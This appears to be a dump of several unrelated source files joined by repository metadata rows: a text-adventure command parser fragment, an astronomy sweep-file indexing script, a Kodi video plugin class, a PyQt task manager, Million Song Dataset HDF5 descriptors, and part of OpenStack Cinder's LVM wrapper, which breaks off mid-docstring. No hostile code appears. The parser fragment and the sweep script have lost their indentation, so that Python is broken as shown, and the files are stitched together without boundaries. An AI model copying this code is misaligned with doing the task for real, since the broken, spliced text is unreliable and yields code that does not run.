potential_verbs += t.verbs.keys()
# extract the VERB
verb = None
potential_verbs.sort(key=lambda key : -len(key))
for v in potential_verbs:
vv = v.split()
if list_prefix(vv, words):
verb = v
words = words[len(vv):]
if not verb:
verb = words[0]
words = words[1:]
# extract the OBJECT
noun = None
if words:
(noun, words) = get_noun(words, things)
# extract INDIRECT (object) in phrase of the form VERB OBJECT PREPOSITION INDIRECT
indirect = None
if len(words) > 1 and words[0].lower() in prepositions:
(indirect, words) = get_noun(words[1:], things)
self.turn_count += 1
# first check phrases
for thing in things:
f = thing.get_phrase(command, things)
if f:
if isinstance(f, BaseVerb):
if f.act(actor, noun, words):
return
else:
f(self.game, thing)
return
    # if we have an INDIRECT object, try its handler first
# e.g. "hit cat with hammer" -> hammer.hit(actor, 'cat', [])
if indirect:
# try inventory and room contents
things = list(actor.inventory.values()) + \
list(actor.location.contents.values())
for thing in things:
if indirect == thing.name:
v = thing.get_verb(verb)
if v:
if v.act(actor, noun, words):
return
for a in actor.location.actors.values():
if indirect == a.name:
v = a.get_verb(verb)
if v:
if v.act(a, noun, words):
return
    # if we have a NOUN, try its handler next
if noun:
for thing in things:
if noun == thing.name:
v = thing.get_verb(verb)
if v:
if v.act(actor, None, words):
return
for a in actor.location.actors.values():
if noun == a.name:
v = a.get_verb(verb)
if v:
if v.act(a, None, words):
return
# location specific VERB
v = actor.location.get_verb(verb)
if v:
if v.act(actor, noun, words):
return
# handle directional moves of the actor
if not noun:
if verb in directions:
actor.act_go1(actor, verb, None)
return
# general actor VERB
v = actor.get_verb(verb)
if v:
if v.act(actor, noun, words):
return
# not understood
self.writer.output("Huh?")
self.turn_count -= 1
return
| mit | -2,709,970,980,162,616,300 | 27.242574 | 91 | 0.603856 | false |
desihub/desitarget | py/desitarget/train/data_collection/sweep_meta.py | 1 | 2600 | #!/usr/bin/env python
import sys
import subprocess
import numpy as np
import astropy.io.fits as fits
def sweep_meta(release, outfits):
if (release == 'dr3'):
sweepdir = '/global/project/projectdirs/cosmo/data/legacysurvey/dr3/sweep/3.1'
if (release == 'dr4'):
sweepdir = '/global/project/projectdirs/cosmo/data/legacysurvey/dr4/sweep/4.0'
if (release == 'dr5'):
sweepdir = '/global/project/projectdirs/cosmo/data/legacysurvey/dr5/sweep/5.0'
if (release == 'dr6'):
sweepdir = '/global/project/projectdirs/cosmo/data/legacysurvey/dr6/sweep/6.0'
if (release == 'dr7'):
sweepdir = '/global/project/projectdirs/cosmo/data/legacysurvey/dr7/sweep/7.1'
if (release == 'dr8n'): # BASS/MzLS
sweepdir = '/global/project/projectdirs/cosmo/data/legacysurvey/dr8/north/sweep/8.0'
if (release == 'dr8s'): # DECaLS
sweepdir = '/global/project/projectdirs/cosmo/data/legacysurvey/dr8/south/sweep/8.0'
if (release == 'dr9n'):
sweepdir = '/global/cscratch1/sd/adamyers/dr9m/north/sweep/'
if (release == 'dr9s'):
sweepdir = '/global/cscratch1/sd/adamyers/dr9m/south/sweep/'
# listing the sweep files
tmpstr = "ls " + sweepdir + "/sweep-???[pm]???-???[pm]???.fits | awk -F \"/\" \"{print $NF}\""
p1 = subprocess.Popen(tmpstr, stdout=subprocess.PIPE, shell=True)
sweeplist = np.array(p1.communicate()[0].decode('ascii').split('\n'))[:-1]
nsweep = len(sweeplist)
ramin, ramax, decmin, decmax = np.zeros(nsweep), np.zeros(nsweep), np.zeros(nsweep), np.zeros(nsweep)
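    # The slicing below assumes the standard 26-character sweep file name;
    # for illustration, "sweep-240p005-250p010.fits" yields
    #   ramin=240 (chars 6:9), ramax=250 (chars 14:17),
    #   decmin=+5 and decmax=+10, with 'p'/'m' at positions 9 and 17
    #   encoding the sign of each declination.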
for i in range(nsweep):
sweeplist[i] = sweeplist[i][-26:]
sweep = sweeplist[i]
ramin[i] = float(sweep[6:9])
ramax[i] = float(sweep[14:17])
if (sweep[9] == 'm'):
decmin[i] = -1. * float(sweep[10:13])
else:
decmin[i] = float(sweep[10:13])
if (sweep[17] == 'm'):
decmax[i] = -1. * float(sweep[18:21])
else:
decmax[i] = float(sweep[18:21])
collist = []
collist.append(fits.Column(name='sweepname', format='26A', array=sweeplist))
collist.append(fits.Column(name='ramin', format='E', array=ramin))
collist.append(fits.Column(name='ramax', format='E', array=ramax))
collist.append(fits.Column(name='decmin', format='E', array=decmin))
collist.append(fits.Column(name='decmax', format='E', array=decmax))
cols = fits.ColDefs(collist)
hdu = fits.BinTableHDU.from_columns(cols)
hdu.writeto(outfits, overwrite=True)
| bsd-3-clause | -4,179,563,077,889,233,000 | 42.067797 | 105 | 0.609615 | false |
generia/plugin.video.zdf_de_2016 | de/generia/kodi/plugin/frontend/zdf/AbstractPage.py | 1 | 3319 | from de.generia.kodi.plugin.frontend.base.Pagelet import Item
from de.generia.kodi.plugin.frontend.base.Pagelet import Action
from de.generia.kodi.plugin.frontend.base.Pagelet import Pagelet
from de.generia.kodi.plugin.frontend.zdf.Constants import Constants
class AbstractPage(Pagelet):
def _createItem(self, teaser):
settings = self.settings
item = None
genre = ''
sep = ''
if teaser.genre:
genre += sep + teaser.genre
sep = ' | '
if teaser.category:
genre += sep + teaser.category
title = teaser.title
#self.log.info("settings.mergeCategoryAndTitle: {} - cat: {}, title: {}, starts: {}.", self.settings.mergeCategoryAndTitle, teaser.category, title, title.startswith(teaser.category))
if settings.mergeCategoryAndTitle and settings.showGenreInTitle:
if teaser.category is not None and title.startswith(teaser.category):
title = title[len(teaser.category):].strip()
#self.log.info("settings.mergeCategoryAndTitle: {} - cat: {}, title: {}, starts: {}.", settings.mergeCategoryAndTitle, teaser.category, title, title.startswith(teaser.category))
if teaser.label is not None and teaser.label != "" and settings.showTagsInTitle:
label = teaser.label
if teaser.type is not None:
label = teaser.type.capitalize() + ": " + label
title = '[' + label + '] ' + title
            title = title.strip()
if teaser.season is not None and teaser.episode is not None and settings.showEpisodeInTitle:
title = str(self._(32047, teaser.season, teaser.episode)) + " - " + title
if teaser.playable and settings.showPlayableInTitle:
title = '(>) ' + title
if genre is not None and genre != "" and settings.showGenreInTitle:
title = '[' + genre + '] ' + title
title = title.strip()
if teaser.date is not None and settings.showDateInTitle:
title = teaser.date + " " + title
isFolder = False
#self.log.info("_createItem: title='{}' contentName='{}' playable='{}'", title, teaser.contentName, teaser.playable)
if teaser.contentName is not None and teaser.playable:
params = {'contentName': teaser.contentName, 'title': title}
if teaser.apiToken is not None:
params['apiToken'] = teaser.apiToken
if teaser.url is not None:
params['videoUrl'] = teaser.url
if teaser.date is not None:
params['date'] = teaser.date
if teaser.duration is not None:
params['duration'] = teaser.duration
if genre is not None:
params['genre'] = genre
action = Action(pagelet='PlayVideo', params=params)
isFolder = False
else:
action = Action(pagelet='RubricPage', params={'rubricUrl': teaser.url})
self.info("redirecting to rubric-url '{}' and teaser-title '{}' ...", teaser.url, title)
isFolder = True
#return None
item = Item(title, action, teaser.image, teaser.text, genre, teaser.date, teaser.duration, isFolder, teaser.playable)
return item
| gpl-2.0 | 3,053,792,430,717,883,400 | 46.414286 | 190 | 0.597168 | false |
jinzekid/codehub | python/test_gui/TaskManager/TaskManager.py | 1 | 2820 | # Author: Jason Lu
import _thread as thread, time
import threading
from MyWindow import Ui_MainWindow as MainWindow
from PyQt5.QtCore import QThread, pyqtSignal, QObject, QDateTime
import LYUtils as utils
# Singleton pattern
# Implemented by overriding __new__
class Singleton(object):
def __new__(cls, *args, **kwargs):
if not hasattr(cls, '_instance'):
orig = super(Singleton, cls)
cls._instance = orig.__new__(cls, *args, **kwargs)
return cls._instance
# Decorator-based version
def singleton(cls, *args, **kwargs):
instances = {}
def getinstance():
if cls not in instances:
instances[cls] = cls(*args, **kwargs)
return instances[cls]
return getinstance
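# Minimal sketch (not part of this module) of what the decorator guarantees,
# using a hypothetical class Foo:
#
#     @singleton
#     class Foo(object):
#         pass
#
#     assert Foo() is Foo()   # both calls return the same cached instance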
@singleton
class TaskManager(QObject):
listOfTasks = []
timer = None
mainWindow = None
    # Define the signal as a class attribute
update_date = pyqtSignal(int, str)
def init_taskManager(self, func_refresh_del_task):
self.timer = None
self.listOfTasks = []
self.removeTasks= []
self.refresh_del_task = func_refresh_del_task
        # Start a new thread
#thread.start_new_thread(self.do_task, ())
pass
def enqueue(self, task):
if not task:return
self.listOfTasks.append(task)
print(">>新任务入队列 ")
def dequeue(self, task):
pass
def get_list_of_tasks(self):
return self.listOfTasks
def destory_task(self, taskToken):
        # Iterate in reverse so entries can be removed while looping
for i in range(len(self.listOfTasks)-1, -1, -1):
task = self.listOfTasks[i]
if task.taskToken == taskToken:
self.refresh_del_task(i, task)
self.listOfTasks.pop(i)
def run(self):
while True:
            curTime = int(time.time())  # get the current timestamp
"""
print("cur time:" + str(curTime) + ", 任务数量: " + str(len(
self.listOfTasks)))
"""
time.sleep(1)
            # Iterate in reverse so entries can be removed while looping
for i in range(len(self.listOfTasks)-1, -1, -1):
task = self.listOfTasks[i]
"""
print('task token:' + task.taskToken +
', left time:' + str(utils.format_time(task.leftTime)))
"""
                # Update the task's remaining time
task.update_task_info(curTime)
if task.is_ready():
if task.is_start(curTime):
task.do_task()
else:
self.update_date.emit(i,
str(utils.format_time(task.leftTime)))
elif task.is_done():
self.refresh_del_task(i, task)
self.listOfTasks.pop(i)
| gpl-3.0 | -6,348,898,284,641,424,000 | 25.613861 | 79 | 0.519345 | false |
judaba13/GenrePredictor | hdf5_descriptors.py | 1 | 3890 | """
This file is used to define classes that hold data for reading from the HDF5 files for MSD
This code was provided by the MSD distributors to read the data.
Thierry Bertin-Mahieux (2010) Columbia University
[email protected]
This code contains descriptors used to create HDF5 files
for the Million Song Database Project.
What information gets in the database should be decided here.
This is part of the Million Song Dataset project from
LabROSA (Columbia University) and The Echo Nest.
Copyright 2010, Thierry Bertin-Mahieux
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
# code relies on pytables, see http://www.pytables.org
import tables
MAXSTRLEN = 1024
class SongMetaData(tables.IsDescription):
"""
Class to hold the metadata of one song
"""
artist_name = tables.StringCol(MAXSTRLEN)
artist_id = tables.StringCol(32)
artist_mbid = tables.StringCol(40)
artist_playmeid = tables.IntCol()
artist_7digitalid = tables.IntCol()
analyzer_version = tables.StringCol(32)
genre = tables.StringCol(MAXSTRLEN)
release = tables.StringCol(MAXSTRLEN)
release_7digitalid = tables.IntCol()
title = tables.StringCol(MAXSTRLEN)
artist_familiarity = tables.Float64Col()
artist_hotttnesss = tables.Float64Col()
song_id = tables.StringCol(32)
song_hotttnesss = tables.Float64Col()
artist_latitude = tables.Float64Col()
artist_longitude = tables.Float64Col()
artist_location = tables.StringCol(MAXSTRLEN)
track_7digitalid = tables.IntCol()
# ARRAY INDICES
idx_similar_artists = tables.IntCol()
idx_artist_terms = tables.IntCol()
# TO ADD
# song mbid
# album mbid
# url
# preview url, 7digital, release_image
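# Illustrative sketch (not part of this module) of how such a descriptor is
# typically consumed by PyTables; the file, group and table names here are
# assumptions, and the camelCase calls are the PyTables 2.x API:
#
#     import tables
#     h5 = tables.openFile("msd_summary.h5", mode="w")
#     table = h5.createTable("/", "metadata", SongMetaData, "song metadata")
#     row = table.row
#     row['artist_name'] = "Some Artist"
#     row.append()
#     table.flush()
#     h5.close()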
class SongAnalysis(tables.IsDescription):
"""
Class to hold the analysis of one song
"""
analysis_sample_rate = tables.IntCol()
audio_md5 = tables.StringCol(32)
danceability = tables.Float64Col()
duration = tables.Float64Col()
end_of_fade_in = tables.Float64Col()
energy = tables.Float64Col()
key = tables.IntCol()
key_confidence = tables.Float64Col()
loudness = tables.Float64Col()
mode = tables.IntCol()
mode_confidence = tables.Float64Col()
start_of_fade_out = tables.Float64Col()
tempo = tables.Float64Col()
time_signature = tables.IntCol()
time_signature_confidence = tables.Float64Col()
track_id = tables.StringCol(32)
# ARRAY INDICES
idx_segments_start = tables.IntCol()
idx_segments_confidence = tables.IntCol()
idx_segments_pitches = tables.IntCol()
idx_segments_timbre = tables.IntCol()
idx_segments_loudness_max = tables.IntCol()
idx_segments_loudness_max_time = tables.IntCol()
idx_segments_loudness_start = tables.IntCol()
idx_sections_start = tables.IntCol()
idx_sections_confidence = tables.IntCol()
idx_beats_start = tables.IntCol()
idx_beats_confidence = tables.IntCol()
idx_bars_start = tables.IntCol()
idx_bars_confidence = tables.IntCol()
idx_tatums_start = tables.IntCol()
idx_tatums_confidence = tables.IntCol()
class SongMusicBrainz(tables.IsDescription):
"""
Class to hold information coming from
MusicBrainz for one song
"""
year = tables.IntCol()
# ARRAY INDEX
idx_artist_mbtags = tables.IntCol() | apache-2.0 | -8,598,590,883,223,135,000 | 34.697248 | 90 | 0.717995 | false |
tobegit3hub/cinder_docker | cinder/brick/local_dev/lvm.py | 1 | 30594 | # Copyright 2013 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
LVM class for performing LVM operations.
"""
import math
import os
import re
from os_brick import executor
from oslo_concurrency import processutils as putils
from oslo_log import log as logging
from oslo_utils import excutils
from six import moves
from cinder import exception
from cinder.i18n import _LE, _LI
from cinder import utils
LOG = logging.getLogger(__name__)
class LVM(executor.Executor):
"""LVM object to enable various LVM related operations."""
LVM_CMD_PREFIX = ['env', 'LC_ALL=C']
def __init__(self, vg_name, root_helper, create_vg=False,
physical_volumes=None, lvm_type='default',
executor=putils.execute, lvm_conf=None):
"""Initialize the LVM object.
The LVM object is based on an LVM VolumeGroup, one instantiation
for each VolumeGroup you have/use.
:param vg_name: Name of existing VG or VG to create
:param root_helper: Execution root_helper method to use
:param create_vg: Indicates the VG doesn't exist
and we want to create it
:param physical_volumes: List of PVs to build VG on
:param lvm_type: VG and Volume type (default, or thin)
:param executor: Execute method to use, None uses common/processutils
"""
super(LVM, self).__init__(execute=executor, root_helper=root_helper)
self.vg_name = vg_name
self.pv_list = []
self.vg_size = 0.0
self.vg_free_space = 0.0
self.vg_lv_count = 0
self.vg_uuid = None
self.vg_thin_pool = None
self.vg_thin_pool_size = 0.0
self.vg_thin_pool_free_space = 0.0
self._supports_snapshot_lv_activation = None
self._supports_lvchange_ignoreskipactivation = None
self.vg_provisioned_capacity = 0.0
# Ensure LVM_SYSTEM_DIR has been added to LVM.LVM_CMD_PREFIX
# before the first LVM command is executed, and use the directory
# where the specified lvm_conf file is located as the value.
if lvm_conf and os.path.isfile(lvm_conf):
lvm_sys_dir = os.path.dirname(lvm_conf)
LVM.LVM_CMD_PREFIX = ['env',
'LC_ALL=C',
'LVM_SYSTEM_DIR=' + lvm_sys_dir]
if create_vg and physical_volumes is not None:
self.pv_list = physical_volumes
try:
self._create_vg(physical_volumes)
except putils.ProcessExecutionError as err:
LOG.exception(_LE('Error creating Volume Group'))
LOG.error(_LE('Cmd :%s'), err.cmd)
LOG.error(_LE('StdOut :%s'), err.stdout)
LOG.error(_LE('StdErr :%s'), err.stderr)
raise exception.VolumeGroupCreationFailed(vg_name=self.vg_name)
if self._vg_exists() is False:
LOG.error(_LE('Unable to locate Volume Group %s'), vg_name)
raise exception.VolumeGroupNotFound(vg_name=vg_name)
# NOTE: we assume that the VG has been activated outside of Cinder
if lvm_type == 'thin':
pool_name = "%s-pool" % self.vg_name
if self.get_volume(pool_name) is None:
try:
self.create_thin_pool(pool_name)
except putils.ProcessExecutionError:
# Maybe we just lost the race against another copy of
# this driver being in init in parallel - e.g.
# cinder-volume and cinder-backup starting in parallel
if self.get_volume(pool_name) is None:
raise
self.vg_thin_pool = pool_name
self.activate_lv(self.vg_thin_pool)
self.pv_list = self.get_all_physical_volumes(root_helper, vg_name)
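    # Illustrative usage sketch (not part of this class); the VG name and the
    # rootwrap helper string below are assumptions, not required values:
    #
    #     root_helper = 'sudo cinder-rootwrap /etc/cinder/rootwrap.conf'
    #     vg = LVM('cinder-volumes', root_helper, lvm_type='thin')
    #     vg.create_volume('volume-0001', '1g', lv_type='thin')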
def _vg_exists(self):
"""Simple check to see if VG exists.
:returns: True if vg specified in object exists, else False
"""
exists = False
cmd = LVM.LVM_CMD_PREFIX + ['vgs', '--noheadings',
'-o', 'name', self.vg_name]
(out, _err) = self._execute(*cmd,
root_helper=self._root_helper,
run_as_root=True)
if out is not None:
volume_groups = out.split()
if self.vg_name in volume_groups:
exists = True
return exists
def _create_vg(self, pv_list):
cmd = ['vgcreate', self.vg_name, ','.join(pv_list)]
self._execute(*cmd, root_helper=self._root_helper, run_as_root=True)
def _get_vg_uuid(self):
cmd = LVM.LVM_CMD_PREFIX + ['vgs', '--noheadings',
'-o', 'uuid', self.vg_name]
(out, _err) = self._execute(*cmd,
root_helper=self._root_helper,
run_as_root=True)
if out is not None:
return out.split()
else:
return []
def _get_thin_pool_free_space(self, vg_name, thin_pool_name):
"""Returns available thin pool free space.
:param vg_name: the vg where the pool is placed
:param thin_pool_name: the thin pool to gather info for
:returns: Free space in GB (float), calculated using data_percent
"""
cmd = LVM.LVM_CMD_PREFIX +\
['lvs', '--noheadings', '--unit=g',
'-o', 'size,data_percent', '--separator',
':', '--nosuffix']
# NOTE(gfidente): data_percent only applies to some types of LV so we
# make sure to append the actual thin pool name
cmd.append("/dev/%s/%s" % (vg_name, thin_pool_name))
free_space = 0.0
try:
(out, err) = self._execute(*cmd,
root_helper=self._root_helper,
run_as_root=True)
if out is not None:
out = out.strip()
data = out.split(':')
pool_size = float(data[0])
data_percent = float(data[1])
consumed_space = pool_size / 100 * data_percent
free_space = pool_size - consumed_space
free_space = round(free_space, 2)
except putils.ProcessExecutionError as err:
LOG.exception(_LE('Error querying thin pool about data_percent'))
LOG.error(_LE('Cmd :%s'), err.cmd)
LOG.error(_LE('StdOut :%s'), err.stdout)
LOG.error(_LE('StdErr :%s'), err.stderr)
return free_space
@staticmethod
def get_lvm_version(root_helper):
"""Static method to get LVM version from system.
:param root_helper: root_helper to use for execute
:returns: version 3-tuple
"""
cmd = LVM.LVM_CMD_PREFIX + ['vgs', '--version']
(out, _err) = putils.execute(*cmd,
root_helper=root_helper,
run_as_root=True)
lines = out.split('\n')
for line in lines:
if 'LVM version' in line:
version_list = line.split()
# NOTE(gfidente): version is formatted as follows:
# major.minor.patchlevel(library API version)[-customisation]
version = version_list[2]
version_filter = r"(\d+)\.(\d+)\.(\d+).*"
r = re.search(version_filter, version)
version_tuple = tuple(map(int, r.group(1, 2, 3)))
return version_tuple
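        # Illustration: a line such as
        #   "  LVM version:     2.02.95(2) (2012-03-06)"
        # yields the tuple (2, 2, 95).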
@staticmethod
def supports_thin_provisioning(root_helper):
"""Static method to check for thin LVM support on a system.
:param root_helper: root_helper to use for execute
:returns: True if supported, False otherwise
"""
return LVM.get_lvm_version(root_helper) >= (2, 2, 95)
@property
def supports_snapshot_lv_activation(self):
"""Property indicating whether snap activation changes are supported.
Check for LVM version >= 2.02.91.
(LVM2 git: e8a40f6 Allow to activate snapshot)
:returns: True/False indicating support
"""
if self._supports_snapshot_lv_activation is not None:
return self._supports_snapshot_lv_activation
self._supports_snapshot_lv_activation = (
self.get_lvm_version(self._root_helper) >= (2, 2, 91))
return self._supports_snapshot_lv_activation
@property
def supports_lvchange_ignoreskipactivation(self):
"""Property indicating whether lvchange can ignore skip activation.
Check for LVM version >= 2.02.99.
(LVM2 git: ab789c1bc add --ignoreactivationskip to lvchange)
"""
if self._supports_lvchange_ignoreskipactivation is not None:
return self._supports_lvchange_ignoreskipactivation
self._supports_lvchange_ignoreskipactivation = (
self.get_lvm_version(self._root_helper) >= (2, 2, 99))
return self._supports_lvchange_ignoreskipactivation
@staticmethod
def get_lv_info(root_helper, vg_name=None, lv_name=None):
"""Retrieve info about LVs (all, in a VG, or a single LV).
:param root_helper: root_helper to use for execute
:param vg_name: optional, gathers info for only the specified VG
:param lv_name: optional, gathers info for only the specified LV
:returns: List of Dictionaries with LV info
"""
cmd = LVM.LVM_CMD_PREFIX + ['lvs', '--noheadings', '--unit=g',
'-o', 'vg_name,name,size', '--nosuffix']
if lv_name is not None and vg_name is not None:
cmd.append("%s/%s" % (vg_name, lv_name))
elif vg_name is not None:
cmd.append(vg_name)
try:
(out, _err) = putils.execute(*cmd,
root_helper=root_helper,
run_as_root=True)
except putils.ProcessExecutionError as err:
with excutils.save_and_reraise_exception(reraise=True) as ctx:
if "not found" in err.stderr or "Failed to find" in err.stderr:
ctx.reraise = False
LOG.info(_LI("Logical Volume not found when querying "
"LVM info. (vg_name=%(vg)s, lv_name=%(lv)s"),
{'vg': vg_name, 'lv': lv_name})
out = None
lv_list = []
if out is not None:
volumes = out.split()
iterator = moves.zip(*[iter(volumes)] * 3) # pylint: disable=E1101
for vg, name, size in iterator:
lv_list.append({"vg": vg, "name": name, "size": size})
return lv_list
def get_volumes(self, lv_name=None):
"""Get all LV's associated with this instantiation (VG).
:returns: List of Dictionaries with LV info
"""
return self.get_lv_info(self._root_helper,
self.vg_name,
lv_name)
def get_volume(self, name):
"""Get reference object of volume specified by name.
:returns: dict representation of Logical Volume if exists
"""
ref_list = self.get_volumes(name)
for r in ref_list:
if r['name'] == name:
return r
return None
@staticmethod
def get_all_physical_volumes(root_helper, vg_name=None):
"""Static method to get all PVs on a system.
:param root_helper: root_helper to use for execute
:param vg_name: optional, gathers info for only the specified VG
:returns: List of Dictionaries with PV info
"""
field_sep = '|'
cmd = LVM.LVM_CMD_PREFIX + ['pvs', '--noheadings',
'--unit=g',
'-o', 'vg_name,name,size,free',
'--separator', field_sep,
'--nosuffix']
(out, _err) = putils.execute(*cmd,
root_helper=root_helper,
run_as_root=True)
pvs = out.split()
if vg_name is not None:
pvs = [pv for pv in pvs if vg_name == pv.split(field_sep)[0]]
pv_list = []
for pv in pvs:
fields = pv.split(field_sep)
pv_list.append({'vg': fields[0],
'name': fields[1],
'size': float(fields[2]),
'available': float(fields[3])})
return pv_list
def get_physical_volumes(self):
"""Get all PVs associated with this instantiation (VG).
:returns: List of Dictionaries with PV info
"""
self.pv_list = self.get_all_physical_volumes(self._root_helper,
self.vg_name)
return self.pv_list
@staticmethod
def get_all_volume_groups(root_helper, vg_name=None):
"""Static method to get all VGs on a system.
:param root_helper: root_helper to use for execute
:param vg_name: optional, gathers info for only the specified VG
:returns: List of Dictionaries with VG info
"""
cmd = LVM.LVM_CMD_PREFIX + ['vgs', '--noheadings',
'--unit=g', '-o',
'name,size,free,lv_count,uuid',
'--separator', ':',
'--nosuffix']
if vg_name is not None:
cmd.append(vg_name)
(out, _err) = putils.execute(*cmd,
root_helper=root_helper,
run_as_root=True)
vg_list = []
if out is not None:
vgs = out.split()
for vg in vgs:
fields = vg.split(':')
vg_list.append({'name': fields[0],
'size': float(fields[1]),
'available': float(fields[2]),
'lv_count': int(fields[3]),
'uuid': fields[4]})
return vg_list
def update_volume_group_info(self):
"""Update VG info for this instantiation.
Used to update member fields of object and
provide a dict of info for caller.
:returns: Dictionaries of VG info
"""
vg_list = self.get_all_volume_groups(self._root_helper, self.vg_name)
if len(vg_list) != 1:
LOG.error(_LE('Unable to find VG: %s'), self.vg_name)
raise exception.VolumeGroupNotFound(vg_name=self.vg_name)
self.vg_size = float(vg_list[0]['size'])
self.vg_free_space = float(vg_list[0]['available'])
self.vg_lv_count = int(vg_list[0]['lv_count'])
self.vg_uuid = vg_list[0]['uuid']
total_vols_size = 0.0
if self.vg_thin_pool is not None:
# NOTE(xyang): If providing only self.vg_name,
# get_lv_info will output info on the thin pool and all
# individual volumes.
# get_lv_info(self._root_helper, 'stack-vg')
# sudo lvs --noheadings --unit=g -o vg_name,name,size
# --nosuffix stack-vg
# stack-vg stack-pool 9.51
# stack-vg volume-13380d16-54c3-4979-9d22-172082dbc1a1 1.00
# stack-vg volume-629e13ab-7759-46a5-b155-ee1eb20ca892 1.00
# stack-vg volume-e3e6281c-51ee-464c-b1a7-db6c0854622c 1.00
#
# If providing both self.vg_name and self.vg_thin_pool,
# get_lv_info will output only info on the thin pool, but not
# individual volumes.
# get_lv_info(self._root_helper, 'stack-vg', 'stack-pool')
# sudo lvs --noheadings --unit=g -o vg_name,name,size
# --nosuffix stack-vg/stack-pool
# stack-vg stack-pool 9.51
#
# We need info on both the thin pool and the volumes,
# therefore we should provide only self.vg_name, but not
# self.vg_thin_pool here.
for lv in self.get_lv_info(self._root_helper,
self.vg_name):
lvsize = lv['size']
# get_lv_info runs "lvs" command with "--nosuffix".
# This removes "g" from "1.00g" and only outputs "1.00".
# Running "lvs" command without "--nosuffix" will output
# "1.00g" if "g" is the unit.
# Remove the unit if it is in lv['size'].
if not lv['size'][-1].isdigit():
lvsize = lvsize[:-1]
if lv['name'] == self.vg_thin_pool:
self.vg_thin_pool_size = lvsize
tpfs = self._get_thin_pool_free_space(self.vg_name,
self.vg_thin_pool)
self.vg_thin_pool_free_space = tpfs
else:
total_vols_size = total_vols_size + float(lvsize)
total_vols_size = round(total_vols_size, 2)
self.vg_provisioned_capacity = total_vols_size
def _calculate_thin_pool_size(self):
"""Calculates the correct size for a thin pool.
Ideally we would use 100% of the containing volume group and be done.
But the 100%VG notation to lvcreate is not implemented and thus cannot
be used. See https://bugzilla.redhat.com/show_bug.cgi?id=998347
Further, some amount of free space must remain in the volume group for
metadata for the contained logical volumes. The exact amount depends
on how much volume sharing you expect.
:returns: An lvcreate-ready string for the number of calculated bytes.
"""
# make sure volume group information is current
self.update_volume_group_info()
# leave 5% free for metadata
return "%sg" % (self.vg_free_space * 0.95)
def create_thin_pool(self, name=None, size_str=None):
"""Creates a thin provisioning pool for this VG.
The syntax here is slightly different than the default
lvcreate -T, so we'll just write a custom cmd here
and do it.
:param name: Name to use for pool, default is "<vg-name>-pool"
:param size_str: Size to allocate for pool, default is entire VG
:returns: The size string passed to the lvcreate command
"""
if not self.supports_thin_provisioning(self._root_helper):
LOG.error(_LE('Requested to setup thin provisioning, '
'however current LVM version does not '
'support it.'))
return None
if name is None:
name = '%s-pool' % self.vg_name
vg_pool_name = '%s/%s' % (self.vg_name, name)
if not size_str:
size_str = self._calculate_thin_pool_size()
cmd = ['lvcreate', '-T', '-L', size_str, vg_pool_name]
LOG.debug("Creating thin pool '%(pool)s' with size %(size)s of "
"total %(free)sg", {'pool': vg_pool_name,
'size': size_str,
'free': self.vg_free_space})
self._execute(*cmd,
root_helper=self._root_helper,
run_as_root=True)
self.vg_thin_pool = name
return size_str
def create_volume(self, name, size_str, lv_type='default', mirror_count=0):
"""Creates a logical volume on the object's VG.
:param name: Name to use when creating Logical Volume
:param size_str: Size to use when creating Logical Volume
:param lv_type: Type of Volume (default or thin)
:param mirror_count: Use LVM mirroring with specified count
"""
if lv_type == 'thin':
pool_path = '%s/%s' % (self.vg_name, self.vg_thin_pool)
cmd = ['lvcreate', '-T', '-V', size_str, '-n', name, pool_path]
else:
cmd = ['lvcreate', '-n', name, self.vg_name, '-L', size_str]
if mirror_count > 0:
cmd.extend(['-m', mirror_count, '--nosync',
'--mirrorlog', 'mirrored'])
terras = int(size_str[:-1]) / 1024.0
if terras >= 1.5:
rsize = int(2 ** math.ceil(math.log(terras) / math.log(2)))
# NOTE(vish): Next power of two for region size. See:
# http://red.ht/U2BPOD
cmd.extend(['-R', str(rsize)])
try:
self._execute(*cmd,
root_helper=self._root_helper,
run_as_root=True)
except putils.ProcessExecutionError as err:
LOG.exception(_LE('Error creating Volume'))
LOG.error(_LE('Cmd :%s'), err.cmd)
LOG.error(_LE('StdOut :%s'), err.stdout)
LOG.error(_LE('StdErr :%s'), err.stderr)
raise
@utils.retry(putils.ProcessExecutionError)
def create_lv_snapshot(self, name, source_lv_name, lv_type='default'):
"""Creates a snapshot of a logical volume.
:param name: Name to assign to new snapshot
:param source_lv_name: Name of Logical Volume to snapshot
:param lv_type: Type of LV (default or thin)
"""
source_lvref = self.get_volume(source_lv_name)
if source_lvref is None:
LOG.error(_LE("Trying to create snapshot by non-existent LV: %s"),
source_lv_name)
raise exception.VolumeDeviceNotFound(device=source_lv_name)
cmd = ['lvcreate', '--name', name,
'--snapshot', '%s/%s' % (self.vg_name, source_lv_name)]
if lv_type != 'thin':
size = source_lvref['size']
cmd.extend(['-L', '%sg' % (size)])
try:
self._execute(*cmd,
root_helper=self._root_helper,
run_as_root=True)
except putils.ProcessExecutionError as err:
LOG.exception(_LE('Error creating snapshot'))
LOG.error(_LE('Cmd :%s'), err.cmd)
LOG.error(_LE('StdOut :%s'), err.stdout)
LOG.error(_LE('StdErr :%s'), err.stderr)
raise
def _mangle_lv_name(self, name):
# Linux LVM reserves name that starts with snapshot, so that
# such volume name can't be created. Mangle it.
if not name.startswith('snapshot'):
return name
return '_' + name
def deactivate_lv(self, name):
lv_path = self.vg_name + '/' + self._mangle_lv_name(name)
cmd = ['lvchange', '-a', 'n']
cmd.append(lv_path)
try:
self._execute(*cmd,
root_helper=self._root_helper,
run_as_root=True)
except putils.ProcessExecutionError as err:
LOG.exception(_LE('Error deactivating LV'))
LOG.error(_LE('Cmd :%s'), err.cmd)
LOG.error(_LE('StdOut :%s'), err.stdout)
LOG.error(_LE('StdErr :%s'), err.stderr)
raise
def activate_lv(self, name, is_snapshot=False, permanent=False):
"""Ensure that logical volume/snapshot logical volume is activated.
:param name: Name of LV to activate
